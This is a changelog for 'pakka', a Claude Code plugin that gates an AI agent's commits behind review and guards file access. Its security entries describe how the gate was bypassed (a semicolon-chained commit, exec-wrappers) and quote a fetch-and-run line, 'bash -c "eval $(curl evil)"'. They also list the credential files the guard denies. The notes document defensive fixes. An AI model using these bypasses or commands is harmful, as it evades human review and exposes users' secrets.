pakka. v0.19.0 · shipped

changelog.

Shipped, not announced. Every release tagged in main, signed, pushed to the marketplace.

v0.19.0 2026-07-24

current shipped

Policy floor — a gate local settings cannot weaken.

A committed .pakka/policy.json is now enforced inside the binary — an org minimum that local settings can be lowered to but never below. Strict-direction thresholds are clamped, locked guard categories fail closed on unknown names, input-compress can be locked, and a present policy forces the gate on regardless of a repo's local autoGate. Git is the distribution — commit the file and every clone inherits the floor, no server in the loop. Alongside it, marker freshness goes diff-bound: a review pass whose marker still matches the staged diff stays valid for 30 minutes instead of expiring on a 5-minute timer.

policy.

feat: Committed .pakka/policy.json enforced in-binary as an org floor — strict-direction threshold clamps, locked guard categories fail closed on unknown names, input-compress lock.
feat: A present policy forces the gate on regardless of local autoGate. Git is the distribution — commit the file, every clone inherits the floor; no server.
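
The floor semantics above can be illustrated with a minimal Go sketch. Everything here is hypothetical: the function names, the category names, and the assumption that a larger threshold value is the stricter one. It is not the shipped policy code, only one way the three rules (clamp, fail closed, force the gate on) could fit together.

```go
package main

import "fmt"

// clampToFloor returns the effective threshold. Assumption for this sketch:
// larger means stricter, so a local value below the floor is raised to it.
func clampToFloor(local, floor int) int {
	if local < floor {
		return floor
	}
	return local
}

// effectiveAutoGate models "a present policy forces the gate on".
func effectiveAutoGate(localAutoGate, policyPresent bool) bool {
	return policyPresent || localAutoGate
}

// validateLocked fails closed: an unknown locked category is an error,
// never a silently ignored entry.
func validateLocked(locked []string, known map[string]bool) error {
	for _, name := range locked {
		if !known[name] {
			return fmt.Errorf("unknown locked guard category %q", name)
		}
	}
	return nil
}

func main() {
	known := map[string]bool{"secrets": true, "network": true} // hypothetical names
	fmt.Println(clampToFloor(1, 3))                            // local below floor
	fmt.Println(effectiveAutoGate(false, true))                // policy present
	fmt.Println(validateLocked([]string{"secrets", "typo"}, known))
}
```

Returning an error on an unknown name, rather than skipping it, is what keeps a typo in the policy file from quietly unlocking a category.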

gate · dx.

feat: Marker freshness is now diff-bound — a matching diff stays reviewed for 30 minutes instead of expiring on a 5-minute timer; 1-hour hard ceiling; policy may lower.

v0.18.0 2026-07-24

shipped

tag · v0.18.0

Consolidation — drift verified, upgrade nudge shipped.

The status line now surfaces when a newer plugin version is already sitting in your marketplace cache — a pure local readdir, zero network, with an ASCII fallback when the terminal can't render the glyph. Alongside it, a consolidation pass: the eval layer runs clean across every command and agent doc, the DESIGN.md v0 plan is marked historical, and the week's decisions are recorded.

statusline.

feat: Upgrade segment shows a newer cached plugin version when one exists — pure local readdir over the marketplace cache, zero network, ASCII fallback.

docs.

fix: Eval layer-1 clean across all command and agent docs; DESIGN.md v0 plan marked historical; the week's decisions recorded.

v0.17.0 2026-07-24

shipped

tag · v0.17.0

Hook latency — every budget passes.

The hooks on the hot path shed the fat binary's startup floor. A slim pakka-hot binary drops the two costs that dominated cold start — SQLite's ~4ms init and net/http's ~1.8ms — so the measured floor falls from 9.7ms to 3.8ms. The guard hook now lands p95 under its 10ms budget and commit-gate passthrough p95 at 4.2ms under its 5ms budget — both had been failing since v0.12.0.

perf.

perf: Slim pakka-hot binary sheds the fat binary's startup floor — SQLite ~4ms + net/http ~1.8ms init measured out; hot-path floor 9.7ms → 3.8ms.
perf: Guard hook p95 under its 10ms budget; commit-gate passthrough p95 4.2ms under its 5ms budget — both failing since v0.12.0, now passing.

statusline.

perf: Per-project-dir resolution cached by mtime — unchanged dirs render with zero file opens and zero git execs.

v0.16.0 2026-07-23

shipped

tag · v0.16.0

Review provenance — commits carry what the review found.

A review pass no longer certifies only which diff it saw — it certifies what it found. review-pass --findings binds the verdict file's hash and its severity counts into the pass marker, and the gate re-hashes that evidence at commit time — swap the findings after the pass and the commit is blocked. The Reviewed-by-pakka trailer now carries both the diff and findings digests with their counts, and every finding's rationale is indexed for /pakka:recall.

gate.

feat: review-pass --findings binds the verdict file hash and severity counts into the pass marker; the gate re-hashes at commit and blocks swapped evidence.
feat: The Reviewed-by-pakka trailer carries diff + findings digests with their counts.
feat: Findings rationale is indexed and searchable via /pakka:recall.

v0.15.1 2026-07-22

shipped

tag · v0.15.1

spec-generate repo guard + compaction coverage pinned.

spec-generate now anchors its output to the git toplevel and errors when run outside a repo — it was CWD-relative before, and could file specs into the wrong repo. Plus a regression test pins the SessionStart matcher covering the compact source, so compaction re-injection can't silently regress; PostCompact-as-injector was investigated and rejected — Claude Code 2.1 discards its output.

spec-generate · fix.

fix: Output anchored to the git toplevel; errors when run outside a repo. Was CWD-relative and could file specs into the wrong repo.

hooks.

fix: Regression test pins the SessionStart matcher covering source compact — compaction re-injection can't silently regress. PostCompact-as-injector investigated and rejected: Claude Code 2.1 discards its output.

v0.15.0 2026-07-22

shipped

tag · v0.15.0

Gate integrity — pass markers now bound to the reviewed diff.

A review pass now certifies a specific diff, not a moment in time. The review gate writes a JSON marker hashing the exact staged diff, and requires a fresh match before it will let a commit through — a pass earned for one diff can never authorize another. Legacy timestamp-only markers are rejected outright. On the fix path, the Reviewed-by-pakka attestation trailer verifies the diff hash before it stamps, and --trailer injection no longer collides with pathspec commits.

gate.

feat: A review pass writes a JSON marker hashing the exact staged diff; the gate requires a fresh match before allowing a commit — a pass for one diff can never authorize another. Legacy timestamp markers are rejected.
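
The binding between a pass and a diff can be sketched as follows. The marker's field names and the choice of SHA-256 are assumptions for illustration; the entry only states that the marker is JSON and hashes the exact staged diff. The freshness check is left out to keep the example focused on the hash match.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"fmt"
)

// passMarker is a hypothetical marker layout.
type passMarker struct {
	DiffSHA256 string `json:"diffSha256"`
	PassedAt   int64  `json:"passedAt"`
}

func hashDiff(diff []byte) string {
	sum := sha256.Sum256(diff)
	return hex.EncodeToString(sum[:])
}

// writeMarker serializes a marker for the diff the review actually saw.
func writeMarker(diff []byte, unix int64) ([]byte, error) {
	return json.Marshal(passMarker{DiffSHA256: hashDiff(diff), PassedAt: unix})
}

// gateAllows re-hashes the staged diff and compares it to the marker.
// A bare timestamp (legacy marker) does not decode into the struct,
// so it is rejected.
func gateAllows(markerJSON, stagedDiff []byte) bool {
	var m passMarker
	if err := json.Unmarshal(markerJSON, &m); err != nil {
		return false
	}
	if m.DiffSHA256 == "" {
		return false
	}
	return m.DiffSHA256 == hashDiff(stagedDiff)
}

func main() {
	marker, err := writeMarker([]byte("diff A"), 1)
	if err != nil {
		panic(err)
	}
	fmt.Println(gateAllows(marker, []byte("diff A")))               // same diff
	fmt.Println(gateAllows(marker, []byte("diff B")))               // different diff
	fmt.Println(gateAllows([]byte("1721650000"), []byte("diff A"))) // legacy marker
}
```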

gate · fix.

fix: The Reviewed-by-pakka attestation trailer verifies the diff hash before stamping; --trailer injection no longer collides with pathspec commits.

v0.14.0 2026-07-22

shipped

tag · v0.14.0

Measured output reduction + data-loss fix.

The savings meter stops leaning on a calibrated constant where it has real data. Benchmark A/B runs now persist the measured per-repo reduction ratio, and the status line + RECEIPTS resolve that measured figure first — falling back to the calibrated constant only when no measurement exists, with the provenance disclosed either way. Plus a compression data-loss fix: empty-outputSHA state entries no longer clobber your edits with a stale snapshot.

meter.

feat: Benchmark A/B runs persist the measured per-repo reduction ratio. Status line + RECEIPTS resolve the measured figure first, calibrated-constant fallback only when no measurement exists — provenance disclosed as measured, n=K or default calibration.
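
A minimal sketch of the measured-first resolution, assuming the persisted measurements are averaged (the entry does not say how multiple runs are combined, so the mean is an assumption, as are all names):

```go
package main

import "fmt"

// resolved pairs a reduction ratio with a provenance label so the
// display can disclose where the number came from.
type resolved struct {
	Ratio      float64
	Provenance string
}

// resolveRatio prefers measured per-repo ratios and falls back to the
// calibrated constant only when no measurement exists.
func resolveRatio(measured []float64, calibrated float64) resolved {
	if len(measured) == 0 {
		return resolved{Ratio: calibrated, Provenance: "default calibration"}
	}
	sum := 0.0
	for _, r := range measured {
		sum += r
	}
	return resolved{
		Ratio:      sum / float64(len(measured)),
		Provenance: fmt.Sprintf("measured, n=%d", len(measured)),
	}
}

func main() {
	fmt.Println(resolveRatio(nil, 0.66).Provenance)
	fmt.Println(resolveRatio([]float64{0.5, 0.7}, 0.66).Provenance)
}
```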

compress · fix.

fix: Empty-outputSHA state entries no longer clobber user edits with a stale snapshot — the live file is adopted as the source of truth.

docs.

fix: README gates-first positioning; cached-environment guidance added.

v0.13.0 2026-07-22

shipped

tag · v0.13.0

Enterprise-feedback release — honest savings accounting, opt-in input compression, verifiable supply chain.

The savings meter now prices input-side savings at a blended cache-aware rate instead of a flat fresh-input rate that overstated by ~10× in heavily cached environments. Input-file compression is opt-in and off by default. And every release is now reproducible and attested — clean-tree gate, -trimpath, SHA256SUMS, SLSA provenance, CycloneDX SBOM.

meter · pricing.

fix: Savings meter prices input-side savings at a blended cache-aware rate — fresh 1× / cache-write 1.25× / cache-read 0.1× from session telemetry. Was a flat fresh-input rate that overstated savings by ~10× in heavily cached environments.
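
The blended rate can be read as a token-weighted average of the three multipliers. The sketch below uses the multipliers from the entry; the struct, the function name, and the fallback to 1.0 when no telemetry exists are assumptions.

```go
package main

import "fmt"

// usage holds input-token counts by cache class, as session telemetry
// might report them (hypothetical shape).
type usage struct {
	Fresh      int64
	CacheWrite int64
	CacheRead  int64
}

// blendedMultiplier weights each class by its share of input tokens:
// fresh 1x, cache-write 1.25x, cache-read 0.1x.
func blendedMultiplier(u usage) float64 {
	total := u.Fresh + u.CacheWrite + u.CacheRead
	if total == 0 {
		return 1.0 // assumption: no telemetry means price as fresh input
	}
	weighted := float64(u.Fresh)*1.0 +
		float64(u.CacheWrite)*1.25 +
		float64(u.CacheRead)*0.1
	return weighted / float64(total)
}

func main() {
	allFresh := usage{Fresh: 1000}
	allCached := usage{CacheRead: 1000}
	fmt.Printf("%.2f\n", blendedMultiplier(allFresh))
	fmt.Printf("%.2f\n", blendedMultiplier(allCached))
}
```

When nearly all input is cache reads, the multiplier approaches 0.1, which is where the ~10× overstatement of a flat fresh-input rate comes from.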

compress.

feat: Input-file compression is now opt-in, default off — enable with PAKKA_INPUT_COMPRESS=1 or pakka.compress.input.

release · supply-chain.

feat: Reproducible releases — clean-tree gate, -trimpath, SHA256SUMS, SLSA provenance attestation, CycloneDX SBOM.

docs.

fix: README egress wording made precise.

v0.12.1 2026-07-21

shipped

tag · v0.12.1

Hotfix — status-line $ saved restored to repo-cumulative.

A one-line regression from v0.12.0. The Claude Code 2.1 native payload is context-window-scoped; v0.12.0 let it feed the $-saved figure, narrowing it from repo-cumulative to the live session. The native payload now feeds only the context segment — every cumulative figure comes from the cached transcript scan again.

statusline.

fix: $ saved figure is repo-cumulative again on CC 2.1 native payloads. v0.12.0 sourced the token figures — and thus the $-saved output side and savings-% denominator — from the session-scoped context_window.current_usage. The native payload now feeds only the ctx segment (#34, #35).

v0.12.0 2026-07-21

shipped

tag · v0.12.0

Consolidation — level convergence, CC 2.1 compat, measured hook latency.

Five PRs of hardening. Compression level fallbacks converge on a single source, so the configured level applies uniformly and the super-ultra default is now honest in both the runtime ruleset and the docs. The status line adopts Claude Code 2.1's native payload — context usage comes off hook stdin with zero transcript IO on the render path. And hook latency is now measured, not asserted.

compress · output-rules.

fix: Compression level fallbacks converged on one source (semantic.ParseLevel via resolveOutputLevel) — the configured level now applies uniformly across the pipeline.
fix: Runtime ruleset + command docs corrected to the super-ultra default — first release carrying the fix.

statusline · bench.

feat: Claude Code 2.1 native statusLine payload — context-window usage read from hook stdin, zero transcript IO on the render hot path; transcript-scan fallback retained for older Claude Code. Adds displayName to plugin.json.
feat: Hook hot-path latency benchmark harness (make bench-latency) + benchmarks/latency-v0.12.0.md. Known: non-commit passthrough p95 9.2ms vs 5ms budget — shared binary startup floor, fix tracked in #17.

v0.11.0 2026-06-11

shipped

tag · v0.11.0

A fourth reviewer, a kill-switch, honest accounting.

Eight PRs. The review gate gains a performance lens. Guard learns a per-repo allowlist from your overrides and now covers secret writes, not just reads. Benchmarking runs through claude -p on your existing session — no API key. And the published output-tokens figure is re-based: the old sum-of-snapshots overcounted; canonical attribution doesn't.

review · guard.

feat: Performance reviewer agent — fourth parallel review lens (kind="performance") plus 3 perf eval seeds.
feat: Guard learns a per-repo allowlist (.pakka/guard-allowlist.json) from repeated overrides, with override-count decay; secret categories never allowlistable. Hook matcher widened to Read|Write|Edit|MultiEdit|Bash — secret-write protection now active.

bench · meter.

feat: A/B harness via claude -p on your OAuth session — make bench, zero API-key dependency; PAKKA_DISABLED kill-switch disables every hook for the raw arm.
fix: Canonical repo_root attribution (symlink-resolved, workspace-root aware) + historical backfill retag. Disclosure: cumulative output tokens re-based to ~1,019,833 — the previously published 5,939,566 summed repo-wide snapshots and overcounted. Corrected measurement, not a regression.

gate · compress · pricing.

fix: [skip pakka] honored on AST reject paths; skill-check requires directive intent — bare keyword mentions no longer trigger, scan bounded ~1ms on adversarial input.
feat: Semantic rewriter injection gate — delta-based instruction-shape detection, strict fallback + audit entry on rejection. Pricing adds claude-fable-5, claude-mythos-5, claude-opus-4-8 + dated-ID prefix fallback.

v0.10.0 2026-06-11

shipped

tag · v0.10.0

Whole-codebase audit. Seven fixes.

An audit pass over the full codebase. The commit-gate closes the exec-wrapper bypass and stops running git on every Bash command; the status line reads the meter from a cache instead of rescanning transcripts per render; the meter stops colliding session files; recall stops crashing on FTS5 operator characters.

commit-gate.

fix: Indirect commits via exec-wrappers (xargs, env, sudo, nohup, timeout, …) previously bypassed the gate — now blocked.
fix: Review-state git subprocesses skipped on non-commit Bash commands — removes per-command hot-path latency.
fix: Gate verdicts now written for chained and wrapped commit shapes recognised only by the AST path (new Decision.IsCommit).

statusline · meter.

perf: Meter reads cached via meter-cache.json (mtime+size keyed) — no more full transcript rescan per render; $ savings labeled (est) to mark the constant-multiplier output estimate.
fix: Meter filename now uses the full sanitized session id — was truncated to 8 chars, causing cross-session file collisions.

recall · report · core.

fix: FTS5 queries sanitized — operator characters (:, (, *, ", AND) no longer crash recall.
fix: Report output-tokens figure is now the max repo-filtered cumulative snapshot, not a triangular sum of snapshots.
fix: ~/.pakka/debug.log rotated at 2 MB — was unbounded.
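
One common way to neutralize FTS5 operator characters, which may or may not be the approach recall takes, is to turn every whitespace-separated term into a quoted string literal, doubling any embedded double quotes. Inside a quoted string, characters such as `:`, `(`, `*` and the word `AND` lose their operator meaning. The function name below is hypothetical.

```go
package main

import (
	"fmt"
	"strings"
)

// sanitizeFTS5 quotes each term so FTS5 treats it as literal text.
// Embedded double quotes are escaped by doubling, per FTS5 string syntax.
// An empty or whitespace-only query yields "", which the caller should
// handle before passing it to MATCH.
func sanitizeFTS5(query string) string {
	fields := strings.Fields(query)
	quoted := make([]string, 0, len(fields))
	for _, f := range fields {
		quoted = append(quoted, `"`+strings.ReplaceAll(f, `"`, `""`)+`"`)
	}
	return strings.Join(quoted, " ")
}

func main() {
	fmt.Println(sanitizeFTS5(`foo AND bar:baz`))
	fmt.Println(sanitizeFTS5(`say "hi" (now)*`))
}
```

The trade-off is that users lose access to FTS5 operators entirely; a sanitizer that wanted to keep prefix search, for example, would need a more selective rule.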

v0.9.0 2026-06-02

shipped

tag · v0.9.0

The commit-gate, parsed properly.

v0.8.1's substring fallback was a stopgap. v0.9.0 closes the disease behind it: an AST-based shell parser via mvdan.cc/sh/v3 understands the eight shapes commits actually take — chained git add + commit + push, env prefix, subshells, redirects. The meter also stops shrinking when Claude Code rotates transcripts off disk.

commit-gate.

feat: AST-based parser via mvdan.cc/sh/v3 handles all real invocations — chained shapes (git add . && git commit -m … && git push), env-prefixed (GIT_AUTHOR=… git commit), subshells, redirects (criteria 1-8 of spec).
fix: Closes the disease behind v0.8.1 — substring fallback no longer needed since AST covers the lawful shapes.

meter · core.

feat: pakka-core backfill-output-tokens. Recovers historical session output_tokens from transcripts still on disk.
fix: Meter persists output_tokens per session-end — RECEIPTS figure now monotonic across releases (no longer shrinks as Claude Code rotates transcripts).

release.

fix: Checklist step 1.5 part 2 made conditional; new substep 0.1 runnable doc-sync audit.

v0.8.1 2026-06-01

shipped

tag · v0.8.1

Commit-gate stops eating quoted arguments.

A non-git bash command that mentioned git commit inside a quoted string — a grep, an echo, a doc-fix — was getting rejected as if it were the real thing. The substring fallback now ignores quoted bodies.

commit-gate.

fix: Substring fallback no longer rejects non-git bash commands that mention git commit in quoted arguments (#3).

v0.8.0 2026-05-09

shipped

tag · v0.8.0

Your edits to compressed files survive.

If you edited a live compressed file and then changed compression level, the orchestrator used to silently overwrite your edits. It now detects the edit via OutputSHA comparison and adopts the live file as the new baseline before re-compressing. Snapshot refresh failure also now aborts the pass rather than proceeding with stale content.

orchestrator.

fix: User edits to live compressed files survive compression level changes — previously silently overwritten. Fix detects edit via OutputSHA comparison and adopts live file as new baseline before re-compressing.
fix: Snapshot refresh failure now aborts the compression pass rather than proceeding with stale content — prevents live file overwrite when .original.md write fails.

state.

feat: OutputSHA field in Entry (JSON: outputSHA) — records SHA of last compression output; empty = legacy entry, user-edit check skipped.
feat: GetOutputSHA(absPath string) string method.
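
The user-edit check described in this release can be sketched as a hash comparison between the recorded output and the live file. The `entry` type below is a stand-in for the real Entry, SHA-256 is an assumed hash, and the helper names are hypothetical.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// entry mirrors only the field named in the changelog.
type entry struct {
	OutputSHA string `json:"outputSHA"`
}

func shaOf(content []byte) string {
	sum := sha256.Sum256(content)
	return hex.EncodeToString(sum[:])
}

// userEdited reports whether the live file differs from the last
// compression output. An empty OutputSHA marks a legacy entry, for
// which this release skips the check.
func userEdited(e entry, live []byte) bool {
	if e.OutputSHA == "" {
		return false
	}
	return shaOf(live) != e.OutputSHA
}

func main() {
	out := []byte("compressed output")
	e := entry{OutputSHA: shaOf(out)}
	fmt.Println(userEdited(e, out))                        // untouched file
	fmt.Println(userEdited(e, []byte("edited by a user"))) // edited file
	fmt.Println(userEdited(entry{}, []byte("anything")))   // legacy entry
}
```

When `userEdited` is true, the orchestrator described above adopts the live file as the new baseline before re-compressing instead of overwriting it.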

docs.

feat: Spec 2026-05-09-compress-user-edit-preservation.md (Status: implemented).

v0.7.0 2026-05-09

shipped

tag · v0.7.0

The validator, hardened.

Six validator fixes in one pass — single-char identifiers, env vars in all three forms, semver pre-release suffixes, case-insensitive markers, and language tags with # and . now all survive compression intact. Plus a meter calibration and rune-safe recall previews.

validator.

fix: reInlineCode {2,} → {1,} — single-char identifiers (i, x, -v) now preserved.
fix: reEnvVar extended to ${VAR}, ${var}, $var — braced and lowercase env var forms protected.
fix: reVersion extended to semver pre-release/build suffixes — -rc1, +build.42 now preserved.
fix: reMarker case-insensitive — todo, Todo, TODO all protected.
fix: reFencedTriple/reFencedTilde language tag includes # and . — c#, f#, .proto fences validated.
fix: rePathAbs trailing punctuation stripped from captures — fewer false-positive validator retries.

meter · recall · report.

fix: estimateTokens calibrated to 3.5 bytes/token (was 4) — consistent with WriteSavings.
fix: Rune-safe preview truncation in recall — no more split UTF-8 codepoints in JSON output.
fix: fmtInt MinInt64 guard in report — infinite recursion on crafted JSONL input eliminated.

core.

feat: internal/claudecli extracted as shared package — single source of truth for claude -p argv construction across specfind and compress/semantic.
fix: Quote chars (", ') added to shellMetaRe in stackgate — explicit unquoted-argv contract enforced.

v0.6.0 2026-05-09

shipped

tag · v0.6.0

Ten fixes. One faster status line.

Correctness sweep across compress, recall, the validator, and the commit gate. The status line stops doing an O(N) file walk on every render — transcript cache makes it O(1).

compress.

fix: Language tag preserved on code fences in non-strict modes — was always stripped.
fix: Heading dedup is consecutive-only — repeated headings in different sections no longer silently dropped.
fix: Negative compression (inflation) now written to meter — honest aggregate accounting.

recall.

fix: Non-EOF read errors no longer advance last_offset — silent index data loss eliminated.

guard.

fix: Session nonce added to Reviewed-by-pakka: trailer — pre-planting forgery prevented.
fix: shortSID sanitizes to [A-Za-z0-9_-] before truncating — path traversal via session ID eliminated.
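
A minimal sketch of sanitize-then-truncate for a session ID that ends up in a file name. The character class comes from the entry above; dropping disallowed characters (rather than replacing them) and taking the length as a parameter are assumptions, and the real shortSID signature may differ.

```go
package main

import (
	"fmt"
	"regexp"
)

// Anything outside [A-Za-z0-9_-] is removed before the ID is used
// in a path, so "/" and "." can never reach the file system layer.
var unsafeSIDChars = regexp.MustCompile(`[^A-Za-z0-9_-]`)

// shortSID sanitizes first and truncates second. Truncating first
// could leave traversal characters inside the kept prefix.
func shortSID(id string, n int) string {
	clean := unsafeSIDChars.ReplaceAllString(id, "")
	if n >= 0 && len(clean) > n {
		clean = clean[:n]
	}
	return clean
}

func main() {
	fmt.Println(shortSID("../../etc/passwd", 8))
	fmt.Println(shortSID("a1b2c3d4-e5f6", 8))
}
```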

linguistic.

fix: maybe/perhaps removed from drop list — epistemic inversion prevented.
fix: Article-a rule made case-sensitive — "Plan A", "Press A to continue", "vitamin A" no longer mangled.

validator.

fix: Standalone integers ≥2 digits now preserved — ports, timeouts, counts were being dropped.
fix: rePathAbs leading-anchor extended to :, =, ", ' — paths in config values now protected.

statusline.

perf: Transcript cache at ~/.pakka/transcript-cache.json (mtime/size invalidation) — O(N) file walk → O(1) hot render.
perf: cwdToRepo memoized in readAllTranscripts — O(N) git rev-parse per render → O(1).
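
The mtime/size invalidation used by the transcript cache can be sketched as a map keyed by path whose entries are trusted only while both the modification time and the size still match. The types and field names are hypothetical, and the on-disk JSON layout is not shown.

```go
package main

import "fmt"

// fileKey is the cheap fingerprint taken from a stat call.
type fileKey struct {
	ModTimeNanos int64
	Size         int64
}

// cachedTotal stores the parsed result together with the fingerprint
// it was computed from.
type cachedTotal struct {
	Key    fileKey
	Tokens int64
}

type transcriptCache map[string]cachedTotal

// lookup returns the cached value only if the file is unchanged,
// judged by mtime and size. Otherwise the caller must re-read the file.
func (c transcriptCache) lookup(path string, current fileKey) (int64, bool) {
	e, ok := c[path]
	if !ok || e.Key != current {
		return 0, false
	}
	return e.Tokens, true
}

func (c transcriptCache) store(path string, key fileKey, tokens int64) {
	c[path] = cachedTotal{Key: key, Tokens: tokens}
}

func main() {
	c := transcriptCache{}
	k := fileKey{ModTimeNanos: 100, Size: 2048}
	c.store("session.jsonl", k, 5000)

	_, hit := c.lookup("session.jsonl", k)
	fmt.Println(hit) // unchanged file

	_, hit = c.lookup("session.jsonl", fileKey{ModTimeNanos: 200, Size: 4096})
	fmt.Println(hit) // file grew and was rewritten
}
```

In real use the `fileKey` would come from `os.Stat`, which costs one syscall per file but avoids opening and parsing unchanged transcripts.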

v0.5.3 2026-05-09

shipped security

tag · v0.5.3

Three critical guards closed.

v0.5.3 ships three critical security fixes found in the guard layer. A hostile repo could execute arbitrary code on every git commit via the last-pass-ts path; a semicolon bypass let any commit skip the gate entirely; the validator silently passed negation and percentage inversions. All three are blocked.

security.

fix: [CRITICAL] Git hook RCE. last-pass-ts read without validation; POSIX $(()) evaluated embedded $(…). Hostile repo pre-plants file → executes on every commit. Fixed: POSIX case guard rejects non-numeric values.
fix: [CRITICAL] Commit-gate ; bypass. git commit -m 'msg' ; true caused IsGitCommit=false → Allow=true with zero review and zero audit trailers.
fix: [CRITICAL] Validator negation/percentage blind spot. "Auth is not required" passed the validator unchanged. reNegation and rePercent preservation rules added.

guard.

fix: Write/Edit/MultiEdit/NotebookEdit fell through to Allowed — model could overwrite .env, git hooks, plugin scripts unchecked. checkWrite now routes all write-path tools through checkPath.
fix: isDeniedPath was missing secret stores: ~/.config/gh/hosts.yml, ~/.kube/config, ~/.docker/config.json, ~/.npmrc, id_rsa*, *.pem, service-account*.json, and others now blocked.
fix: evalRe bypassed via quoted -c: bash -c "eval $(curl evil)" was allowed. bashCEvalRe now inspects the quoted arg body.
fix: Absolute system path deny extended: /etc/passwd, /etc/shadow, /root, /proc/self/environ, /sys/kernel now blocked in Bash commands.

core.

fix: Default level divergence: ParseLevel and resolveLevel fallbacks returned ultra while loadOutputLevel returned super-ultra. All three paths now aligned to super-ultra.
fix: [skip pakka] skips now emit a stderr notice and audit note user_skip → skip_marker.

v0.5.2 2026-05-08

shipped

tag · v0.5.2

Status line, fixed for real.

Three bugs caused the status line to show zero savings and phantom stale warnings for anyone running pakka from a parent directory. All three are closed; the stale glyph no longer fires on transient timeouts.

fixes.

fix: Bug count always 0: countBugsCaught only scanned exact repo dir; sessions from a parent dir missed findings in sub-repos. New countAllBugsCaught walks one level of child dirs.
fix: Savings always $0 from parent dir: readAllMeter now prefix-matches (root+"/") so sub-repo sessions aggregate correctly.
fix: ! 1 stale persistent since v0.4.x: DECISIONS.md always timed out at 60s (actual: ~92s for 15KB at super-ultra). Transient rewrite errors no longer record validatorPasses=false. Timeout raised 60s → 180s.
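
The root+"/" prefix match mentioned in the savings fix matters because a bare prefix test would also match sibling directories that merely share a name prefix. A small sketch, with a hypothetical helper name and the assumption that both paths are already cleaned and absolute:

```go
package main

import (
	"fmt"
	"strings"
)

// underRoot reports whether path is root itself or lies below it.
// Appending "/" before the prefix test keeps "/work/app-old" from
// matching root "/work/app".
func underRoot(root, path string) bool {
	root = strings.TrimSuffix(root, "/")
	return path == root || strings.HasPrefix(path, root+"/")
}

func main() {
	fmt.Println(underRoot("/work/app", "/work/app/services/api")) // sub-repo
	fmt.Println(underRoot("/work/app", "/work/app-old/api"))      // sibling
}
```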

v0.5.1 2026-05-08

shipped

tag · v0.5.1

Colors land in the binary.

v0.5.0 shipped the 24-bit ANSI color spec for the status line but the binaries were built before the color changes landed. v0.5.1 is the patch that makes them visible.

fixes.

fix: Status-line ANSI 24-bit colors missing from v0.5.0 binaries — savings now green #6FD08C, bugs caught now red #E8634A.

v0.5.0 2026-05-08

shipped

tag · v0.5.0

The spec gets a generator.

spec-generate arrives as a first-class subcommand. /pakka:plan now pipes directly into it. Review gets spec-drift detection — a warning-level finding when the spec itself changed on the current branch.

spec.

feat: pakka-core spec-generate. Validates 6 required sections, writes to docs/specs/YYYY-MM-DD-<slug>.md, hybrid diff on amend. Slug validated against path traversal.
feat: /pakka:plan now pipes spec content to spec-generate via Bash — no Write tool required.

review.

feat: Spec-drift detection. Warning-level finding when the spec file was modified on the current branch before merge — surfaces before you approve.

fixes.

fix: Status-line CWD: now derives from transcript_path directory instead of event.CWD — corrects savings display from ~$6 to ~$46 on split-repo setups.

v0.4.1 2026-05-07

shipped

tag · v0.4.1 · a2f4d19

Findings learn to cite.

The reviewer agent now anchors every finding to a concrete line range and (when applicable) a clause in the spec it sourced. This is the change that makes /pakka:review output reviewable in code review, not just over-the-shoulder.

review.

feat: Spec-anchored findings. Every finding now carries a cites array (spec §, RFC, ADR, prior turn).
feat: Line-range anchors. Reviewer reports file:[start,end] instead of full-file callouts.
perf: Reviewer panel runs ~3× faster on diffs over 200 lines.

fixes.

fix: Architect agent no longer double-reports the same advisory across re-reviews.
fix: Commit-gate last-pass-ts: was always false for git -C <path> commit. parseCPath + resolveReviewsDir now derive repo root from the commit command.

v0.4.0 2026-05-05

shipped breaking

tag · v0.4.0 · 1b7c003

The spec finds itself.

Gate now reads the spec. pakka-core spec-find discovers the right spec file for the current change and injects it into all three reviewer agents. Findings cite spec clauses, not just line numbers. The merge bar moves from "the model said it's fine" to a thing you can audit.

review.

feat: pakka-core spec-find. Discovers spec file via name match → LLM fallback.
feat: Spec-anchored review. Matched spec injected into all three reviewer agent prompts.
feat: Reviewer agents emit spec-divergence findings against spec acceptance criteria.

spec.

breaking: finding object replaces concern. Migration: rename + drop severity_text.
feat: Added verdict object as the single review result envelope.

v0.3.0 2026-05-02

shipped

tag · v0.3.0 · 5ce91a2

Memory across sessions.

recall arrives. Decisions, contracts, gotchas, customs, and people are extracted as they happen and written to a plain JSONL store the team shares via git. Compress also gets its top mode.

compress.

feat: super-ultra mode. ~66% reduction; auto-extracts decisions before discarding turns.

recall.

feat: FTS5 full-text index over audit trail. index subcommand is idempotent.
feat: Storage at .pakka/recall/; gitignored or shared, your choice.
feat: /pakka:recall. Natural-language query with cited results.
feat: SessionEnd hook: fires pakka-core index — current session entries queryable before next session starts.

v0.2.0 2026-05-02

prior

tag · v0.2.0 · 9f0bd4e

The diet, calibrated.

First version of compress with measured savings. Token-call noise condensed; decisions promoted; four compression levels landed with real benchmark numbers.

compress.

feat: Four levels: lite · strict · ultra · super-ultra. Token-aware turn condensation with a mode dial.
perf: Calibrated from real bench: super-ultra ~66%, ultra ~55%, strict ~33%, lite ~27%.
feat: /pakka:plan · /pakka:build · /pakka:review hub commands replace 14 individual skill commands.

v0.1.0 2026-05-02

prior

tag · v0.1.0 · 0001-of-many

Hello, harness.

First commit. Plugin manifest, marketplace registration, the slash-command surface area. Nothing useful yet — but the scaffold the rest of pakka grows from.

core.

feat: Claude Code plugin manifest; install via /plugin install pakka@pakka-marketplace.
feat: Slash-command stubs for plan, review, recall.
feat: 4-vector output compression with levels: lite · strict · ultra · super-ultra.